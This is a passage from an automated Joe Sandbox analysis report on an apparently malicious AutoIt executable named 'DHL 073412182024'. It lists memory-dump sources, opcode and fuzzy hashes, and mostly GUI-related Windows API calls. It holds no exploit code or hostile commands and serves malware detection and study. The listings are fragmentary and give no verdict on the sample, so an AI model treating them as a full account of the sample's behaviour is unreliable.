                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction ID: 83b40f152af216c6ff74778548d627eeea480edb083f519b75906588a5dce992
                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction Fuzzy Hash: 4781417A5090B349DB6942398574A3EFFE15E933A131E079DD4F2CB1C2EE24C558EA30
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction ID: 284142a05dd79be6a58621f03118965c8d5dbac0841d5dc69ec9b4378c140c94
                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction Fuzzy Hash: 6341D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction ID: 6b59ef856ec966ca1089644826d6bafaf6bd9fe82adfa6853728bd2f16f7ec77
                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction Fuzzy Hash: 6D018078A00109EFCB48DF98C5909AEF7F6FF48310F208599E909A7341D730AE41EB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction ID: 47025742eca7cd430043b7651b86bb3082a3ac655908169d44bbfb856acd4566
                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction Fuzzy Hash: F8018078A00109EFCB44DF98C9909AEF7F6FF48310F208699E909A7352D730AE41DB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1751009954.0000000000FEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FEC000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_fec000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00E22B30
                                                                                      • DeleteObject.GDI32(00000000), ref: 00E22B43
                                                                                      • DestroyWindow.USER32 ref: 00E22B52
                                                                                      • GetDesktopWindow.USER32 ref: 00E22B6D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00E22B74
                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00E22CA3
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00E22CB1
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E22CF8
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00E22D04
                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E22D40
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E22D62
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E22D75
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E22D80
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E22D89
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E22D98
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E22DA1
                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E22DA8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E22DB3
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E22DC5
                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E3FC38,00000000), ref: 00E22DDB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E22DEB
                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00E22E11
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00E22E30
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E22E52
                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E2303F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                      • API String ID: 2211948467-2373415609
                                                                                      • Opcode ID: 7568e16b852255aeacfef4781d868ee71e03fa5e461c7b98c3bdbe13dc3eab0e
                                                                                      • Instruction ID: b5faf29f61f1843a937d49218d63109f88bcc14af6a427951dc5e07a8066f907
                                                                                      • Opcode Fuzzy Hash: 7568e16b852255aeacfef4781d868ee71e03fa5e461c7b98c3bdbe13dc3eab0e
                                                                                      • Instruction Fuzzy Hash: DA028971A00218AFDB14DFA5DC89EAE7BB9EF49710F148158F915BB2A1CB30ED05CB60
                                                                                      APIs
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00E3712F
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E37160
                                                                                      • GetSysColor.USER32(0000000F), ref: 00E3716C
                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00E37186
                                                                                      • SelectObject.GDI32(?,?), ref: 00E37195
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E371C0
                                                                                      • GetSysColor.USER32(00000010), ref: 00E371C8
                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00E371CF
                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00E371DE
                                                                                      • DeleteObject.GDI32(00000000), ref: 00E371E5
                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00E37230
                                                                                      • FillRect.USER32(?,?,?), ref: 00E37262
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E37284
                                                                                        • Part of subcall function 00E373E8: GetSysColor.USER32(00000012), ref: 00E37421
                                                                                        • Part of subcall function 00E373E8: SetTextColor.GDI32(?,?), ref: 00E37425
                                                                                        • Part of subcall function 00E373E8: GetSysColorBrush.USER32(0000000F), ref: 00E3743B
                                                                                        • Part of subcall function 00E373E8: GetSysColor.USER32(0000000F), ref: 00E37446
                                                                                        • Part of subcall function 00E373E8: GetSysColor.USER32(00000011), ref: 00E37463
                                                                                        • Part of subcall function 00E373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E37471
                                                                                        • Part of subcall function 00E373E8: SelectObject.GDI32(?,00000000), ref: 00E37482
                                                                                        • Part of subcall function 00E373E8: SetBkColor.GDI32(?,00000000), ref: 00E3748B
                                                                                        • Part of subcall function 00E373E8: SelectObject.GDI32(?,?), ref: 00E37498
                                                                                        • Part of subcall function 00E373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00E374B7
                                                                                        • Part of subcall function 00E373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E374CE
                                                                                        • Part of subcall function 00E373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00E374DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                      • String ID:
                                                                                      • API String ID: 4124339563-0
                                                                                      • Opcode ID: 11b9de2a9e6bbf6c481d86cfe8eeb2e749837899a8d9c840e87c607bf45ce8c4
                                                                                      • Instruction ID: f991f3f040a383fec3e07cb8ba980d3a314775cc988da5339cbd2f717e63f91b
                                                                                      • Opcode Fuzzy Hash: 11b9de2a9e6bbf6c481d86cfe8eeb2e749837899a8d9c840e87c607bf45ce8c4
                                                                                      • Instruction Fuzzy Hash: 8CA18FB2009305BFDB109F61DC4CA6B7FA9FB49320F201A19F9A2B61E1D771E948DB51
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00DB8E14
                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DF6AC5
                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DF6AFE
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DF6F43
                                                                                        • Part of subcall function 00DB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DB8BE8,?,00000000,?,?,?,?,00DB8BBA,00000000,?), ref: 00DB8FC5
                                                                                      • SendMessageW.USER32(?,00001053), ref: 00DF6F7F
                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DF6F96
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DF6FAC
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DF6FB7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                      • String ID: 0
                                                                                      • API String ID: 2760611726-4108050209
                                                                                      • Opcode ID: c79864cb953d891a49d86df614a79686cf4d3b06572bfcee6347a982c374f13e
                                                                                      • Instruction ID: 6c7777c06aad7578616ec9e61f906502108f73e7cf4046e41ca6c8e92a7e0506
                                                                                      • Opcode Fuzzy Hash: c79864cb953d891a49d86df614a79686cf4d3b06572bfcee6347a982c374f13e
                                                                                      • Instruction Fuzzy Hash: F7128E31200205EFD725DF18C848BB5BBE5FF44301F198469F68AAB661CB32EC96DB61
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000), ref: 00E2273E
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E2286A
                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00E228A9
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00E228B9
                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00E22900
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00E2290C
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00E22955
                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E22964
                                                                                      • GetStockObject.GDI32(00000011), ref: 00E22974
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E22978
                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00E22988
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E22991
                                                                                      • DeleteDC.GDI32(00000000), ref: 00E2299A
                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E229C6
                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E229DD
                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00E22A1D
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E22A31
                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E22A42
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00E22A77
                                                                                      • GetStockObject.GDI32(00000011), ref: 00E22A82
                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E22A8D
                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00E22A97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                      • API String ID: 2910397461-517079104
                                                                                      • Opcode ID: 9299a10a2226e32b529b7f56beb073a803d200bae9ddb7e04820ba319aab7586
                                                                                      • Instruction ID: 8a29d66912693f5e948a3e2d7c7d27e2a92b4850af7c9ecec4be8fdc7f608554
                                                                                      • Opcode Fuzzy Hash: 9299a10a2226e32b529b7f56beb073a803d200bae9ddb7e04820ba319aab7586
                                                                                      • Instruction Fuzzy Hash: 3EB15B71A40219BFEB14DF69DC8AEAE7BA9EB08710F104159FA14F7290D770ED44CBA0
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E14AED
                                                                                      • GetDriveTypeW.KERNEL32(?,00E3CB68,?,\\.\,00E3CC08), ref: 00E14BCA
                                                                                      • SetErrorMode.KERNEL32(00000000,00E3CB68,?,\\.\,00E3CC08), ref: 00E14D36
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveType
                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                      • API String ID: 2907320926-4222207086
                                                                                      • Opcode ID: c308a5978999dd418433ce9704c16424535a47c346b94bd3e4bc32ebc6127480
                                                                                      • Instruction ID: dd2342e92822f00818a3eb1d569c7c46b51c4c87959a7db79c27f4328485aad9
                                                                                      • Opcode Fuzzy Hash: c308a5978999dd418433ce9704c16424535a47c346b94bd3e4bc32ebc6127480
                                                                                      • Instruction Fuzzy Hash: E361C1B1645205DBDB04EF24DA82EE8F7A0EB45784B24A415F806BB3D1DB31ED81DB91
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000012), ref: 00E37421
                                                                                      • SetTextColor.GDI32(?,?), ref: 00E37425
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E3743B
                                                                                      • GetSysColor.USER32(0000000F), ref: 00E37446
                                                                                      • CreateSolidBrush.GDI32(?), ref: 00E3744B
                                                                                      • GetSysColor.USER32(00000011), ref: 00E37463
                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E37471
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00E37482
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00E3748B
                                                                                      • SelectObject.GDI32(?,?), ref: 00E37498
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E374B7
                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E374CE
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E374DB
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E3752A
                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E37554
                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00E37572
                                                                                      • DrawFocusRect.USER32(?,?), ref: 00E3757D
                                                                                      • GetSysColor.USER32(00000011), ref: 00E3758E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00E37596
                                                                                      • DrawTextW.USER32(?,00E370F5,000000FF,?,00000000), ref: 00E375A8
                                                                                      • SelectObject.GDI32(?,?), ref: 00E375BF
                                                                                      • DeleteObject.GDI32(?), ref: 00E375CA
                                                                                      • SelectObject.GDI32(?,?), ref: 00E375D0
                                                                                      • DeleteObject.GDI32(?), ref: 00E375D5
                                                                                      • SetTextColor.GDI32(?,?), ref: 00E375DB
                                                                                      • SetBkColor.GDI32(?,?), ref: 00E375E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                      • String ID:
                                                                                      • API String ID: 1996641542-0
                                                                                      • Opcode ID: 35421ed577ba41153e823f3606348cf9c7460cd7ea83d545ad4d8b0c4118289b
                                                                                      • Instruction ID: e5266882c478e960395173e75acff98e01d3a091ec4ee266e5af574aa0c031c0
                                                                                      • Opcode Fuzzy Hash: 35421ed577ba41153e823f3606348cf9c7460cd7ea83d545ad4d8b0c4118289b
                                                                                      • Instruction Fuzzy Hash: 31615972900218BFDF119FA5DC49AEEBFB9EB08320F214115F915BB2A1D775E940DBA0
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 00E31128
                                                                                      • GetDesktopWindow.USER32 ref: 00E3113D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00E31144
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E31199
                                                                                      • DestroyWindow.USER32(?), ref: 00E311B9
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E311ED
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E3120B
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E3121D
                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E31232
                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E31245
                                                                                      • IsWindowVisible.USER32(00000000), ref: 00E312A1
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E312BC
                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E312D0
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E312E8
                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00E3130E
                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00E31328
                                                                                      • CopyRect.USER32(?,?), ref: 00E3133F
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E313AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                      • String ID: ($0$tooltips_class32
                                                                                      • API String ID: 698492251-4156429822
                                                                                      • Opcode ID: cffc92992390e9a44ffbafc5b1cb2e8248332329437d00d844035902bb0ce423
                                                                                      • Instruction ID: 63bf5a47d6975251536ffea5ff16852df94b6dc34221d6b7d55a96a94bd153fd
                                                                                      • Opcode Fuzzy Hash: cffc92992390e9a44ffbafc5b1cb2e8248332329437d00d844035902bb0ce423
                                                                                      • Instruction Fuzzy Hash: D8B19D71604340AFD704DF65C889B6ABFE4FF84754F00895CF999AB2A1C731E844CBA2
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DB8968
                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00DB8970
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DB899B
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00DB89A3
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00DB89C8
                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DB89E5
                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DB89F5
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DB8A28
                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DB8A3C
                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00DB8A5A
                                                                                      • GetStockObject.GDI32(00000011), ref: 00DB8A76
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DB8A81
                                                                                        • Part of subcall function 00DB912D: GetCursorPos.USER32(?), ref: 00DB9141
                                                                                        • Part of subcall function 00DB912D: ScreenToClient.USER32(00000000,?), ref: 00DB915E
                                                                                        • Part of subcall function 00DB912D: GetAsyncKeyState.USER32(00000001), ref: 00DB9183
                                                                                        • Part of subcall function 00DB912D: GetAsyncKeyState.USER32(00000002), ref: 00DB919D
                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00DB90FC), ref: 00DB8AA8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
